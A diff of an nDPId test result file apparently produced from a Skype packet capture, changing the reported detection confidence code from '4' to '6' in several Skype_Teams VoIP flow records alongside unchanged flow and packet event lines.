-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1047,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970672959,"flow_last_seen":1431970672959,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970672959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.158","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673563,"flow_last_seen":1431970673563,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970673563,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1431970673563,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673563,"pkt":"0NQSxnP1PBXCt3IOCABFAABApWxAAEAGGZLAqAEib91KEshEAbuPHWWLAAAAALAC\/\/+gUwAAAgQFtAEDAwUBAQgKPjIeFQAAAAAEAgAA"} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431970673880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970673880,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGyAJv3UoSwKgBIgG7yEQiaEt4jx1ljKASOJAO\/AAAAgQFrAQCCApNdq5oPjIeFQEDAwk="} 
@@ -623,24 +623,24 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1431970673966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970673966,"pkt":"0NQSxnP1PBXCt3IOCABFAABAY6tAAEAGi8vAqAEi1cezr8hFnF3LCMFlAAAAALAC\/\/+c0QAAAgQFtAEDAwUBAQgKPjIfpgAAAAAEAgAA"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0vU0AAEARcr7AqAEinTfrqzLdnEYAIOCne48C+j3UCj6Khrhd65pIazZgrSV3BW0j"} 
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.171","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zOQAAEARzB\/AqAEinTeCrTLdnEMAJgAFe5ECW1GQc626NgViJqEYKjead5HrxbDyRckYY2Mu"} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1060,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431970673970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970673970,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08VkAAEAR8c7AqAEinTc4jzLdnFIAIGspe5MC1RnFiDDpE1Hd7iM493fNRlWzMToF"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1061,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970673970,"flow_last_seen":1431970673970,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970673970,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/ed8AAEARbbrAqAEinTg0EjLdgQkAK+56e5UCujNYWaHOaIv8Mbnq8Yy9ltzxTGOAleIkOtVygbgwGI4="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/QPIAAEARV4\/AqAEiQTffKzLdnEYAK9tXe5cCDvOGtur9CosePaKDkKEzL5ekZUj+DrgiIjruAPBzlGM="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1080,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2DYgAAEAR1ZfAqAEinTc4ljLdnE4AIk81e5kCIa6rFGHkjW7tTxYGLEfEQXIXcRjIprw="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="} 
@@ -649,75 +649,75 @@ 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABB4XAAAEARAafAqAEinTc4kzLdnE4ALQw6e5sCLpawwxGRzNJ9jeoeh5bY+9RpiszLnAcSdcNuRnMOI9PLQQ=="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1ktIAAEARBdLAqAEiQTffEjLdnFkAIdOte50CPL9ZRieP6CLGvHSnuteGzwQxXE6Sug=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
